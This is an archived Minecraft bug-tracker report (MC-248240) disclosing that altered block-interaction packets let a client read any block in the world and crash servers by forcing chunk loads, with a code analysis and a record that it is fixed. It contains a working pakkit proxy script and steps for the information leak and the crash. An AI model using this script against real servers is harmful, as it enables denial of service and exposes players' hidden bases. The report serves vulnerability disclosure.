Mojira Archive
MC-248240

Arbitrary block fetching

Description

By modifying outgoing block interact packets with a proxy like pakkit (or creating our own with a mod), we can get information on any block in the world. Not only can this be used to find bases on competitive servers by enumerating over coordinates and looking for player-placed blocks, this can also be abused to crash servers because the server will load (and possibly generate) the chunk in order to get the block in the clicked position.

Reproduction steps

  • Connect to a vanilla server while proxied through pakkit.
  • Go to the pakkit scripting tab and enable a script similar to this:
exports.upstreamHandler = function (meta, data, server, client) {
  if (meta.name === 'block_place') {
    data.location = {
      x: 100000, // For the crash issue, replace with some kind of random large number generator, e.g. Math.floor(Math.random() * 1000000)
      y: 100,
      z: 100000
    };
  }
  server.sendPacket(meta, data);
};

exports.downstreamHandler = function (meta, data, server, client) {
  client.sendPacket(meta, data);
};
  • Right click on the ground, or spam right click in order to crash the server.

Alternatively, you could use pakkit's "edit and resend packet" function or create a mod that sends these packets.

I've created an unlisted YouTube video, demonstrating how this can be used to leak blocks (I placed a diamond block surrounded by air at 1000000, 64, 0), and demonstrating how this can be used to crash servers: https://www.youtube.com/watch?v=9ZmNhjKL6xU

Unfortunately, this issue already seems to be "public knowledge" and is getting exploited actively on realms, vanilla and spigot servers (probably fabric too?).

Code analysis

In the ServerGamePacketListenerImpl#handleUseItemOn method, the block update packet is always sent, even if the block is out of range. The simplest solution to this would be to either move the packet sending inside of the distance check, or to simply exit out early if the interacted block is out of range, which is what Paper seems to be doing (and craftbukkit attempts to do).

 

Fixed

Noah van der Aa

[Mojang] Panda

2022-01-24, 01:12 PM

2022-02-09, 01:23 PM

2022-02-09, 01:23 PM

0

1

Plausible

Important

Networking

1.18.1, 22w03a

22w06a